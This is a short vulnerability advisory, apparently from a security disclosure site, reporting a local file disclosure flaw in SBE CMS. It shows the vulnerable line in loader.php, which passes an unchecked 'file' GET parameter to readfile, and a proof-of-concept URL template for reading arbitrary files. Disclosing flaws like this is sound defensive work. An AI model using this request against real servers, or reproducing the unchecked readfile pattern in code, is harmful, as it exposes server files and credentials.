SBE CMS < Local File Disclosure

2017.07.05
ir Shahab Shamsi (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Title : SBE CMS < Local File Disclosure [-] Author : Shahab Shamsi [-] Software Link : https://github.com/zackgilbert/SBE-CMS [-] Version: N/A [-] Tested on : [ Windows ] [-] Category : Webapps [-] Date : 2017 05 July =========== Vulnerable page : =========== /loader.php ========== Vulnerable Code : ========== Line 110 : readfile($_GET['file']); ========== POC URL: ========== http://localhost:8080/SBE-CMS/loader.php?file=[LFD] ========= Contact Me : Telegram : @Shahab_Shamsi Email : info@securityman.org WebSilte : WwW.iran123.Org


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top